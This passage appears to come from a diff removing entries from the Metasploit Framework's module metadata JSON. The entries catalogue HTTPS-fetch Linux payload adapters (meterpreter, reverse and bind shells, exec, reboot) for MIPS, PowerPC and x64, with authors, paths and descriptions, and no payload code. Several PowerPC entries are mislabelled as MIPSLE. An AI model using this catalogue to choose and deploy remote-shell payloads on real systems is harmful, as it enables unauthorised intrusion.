"references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/mipsbe/reboot": { - "name": "HTTPS Fetch, Linux Reboot", - "fullname": "payload/cmd/linux/https/mipsbe/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "rigan - " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/reboot", - "staged": false - }, - "payload_cmd/linux/https/mipsbe/shell/reverse_tcp": { - "name": "HTTPS Fetch, Linux Command 
Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/mipsbe/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsbe/shell", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_cmd/linux/https/mipsbe/shell_bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/https/mipsbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/shell_bind_tcp", - 
"check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/mipsbe/shell_reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/mipsbe/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "rigan ", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", - "references": [ - "EDB-18226" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/mipsle/exec": { - "name": "HTTPS Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/https/mipsle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "entropy " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", - 
"references": [ - "EDB-17940" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/exec", - "staged": false - }, - "payload_cmd/linux/https/mipsle/meterpreter/reverse_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/mipsle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsle/meterpreter", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_cmd/linux/https/mipsle/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mipsle/meterpreter_reverse_http", 
- "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/mipsle/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mipsle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_https", - "staged": false - }, - 
"payload_cmd/linux/https/mipsle/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mipsle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/mipsle/reboot": { - "name": "HTTPS Fetch, Linux Reboot", - "fullname": "payload/cmd/linux/https/mipsle/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "rigan - " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/reboot", - "check": 
false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/reboot", - "staged": false - }, - "payload_cmd/linux/https/mipsle/shell/reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/mipsle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsle/shell", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_cmd/linux/https/mipsle/shell_bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/https/mipsle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nListen for a connection and spawn a command shell", 
- "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/mipsle/shell_reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/mipsle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "rigan ", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/ppc/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/ppc/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ 
- "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/ppc/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/ppc/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/ppc/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": 
"payload/cmd/linux/https/ppc/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/ppc64/shell_bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/https/ppc64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from an HTTPS server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:15 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc64", - "adapted_refname": 
"linux/ppc64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/ppc64/shell_find_port": { - "name": "HTTPS Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/https/ppc64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from an HTTPS server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:15 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc64", - "adapted_refname": "linux/ppc64/shell_find_port", - "staged": false - }, - "payload_cmd/linux/https/ppc64/shell_reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/ppc64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:15 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc64/shell_reverse_tcp", - "check": false, - 
"post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc64", - "adapted_refname": "linux/ppc64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/ppc64le/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/ppc64le/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc64le/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/ppc64le/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/ppc64le/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": 
"/modules/payloads/adapters/cmd/linux/https/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc64le/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/ppc64le/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/ppc64le/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc64le/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/x64/exec": { - "name": "HTTPS Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/https/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "Geyslan G. 
Bem " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nExecute an arbitrary command or just a /bin/sh shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/exec", - "staged": false - }, - "payload_cmd/linux/https/x64/meterpreter/bind_tcp": { - "name": "HTTPS Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/https/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_cmd/linux/https/x64/meterpreter/reverse_sctp": { - "name": "HTTPS Fetch, Reverse SCTP Stager", - "fullname": 
"payload/cmd/linux/https/x64/meterpreter/reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "RageLtMan " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/meterpreter/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/meterpreter/reverse_sctp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_sctp" - }, - "payload_cmd/linux/https/x64/meterpreter/reverse_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "ricky", - "tkmru" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - 
"adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_cmd/linux/https/x64/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/x64/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/meterpreter_reverse_https", - 
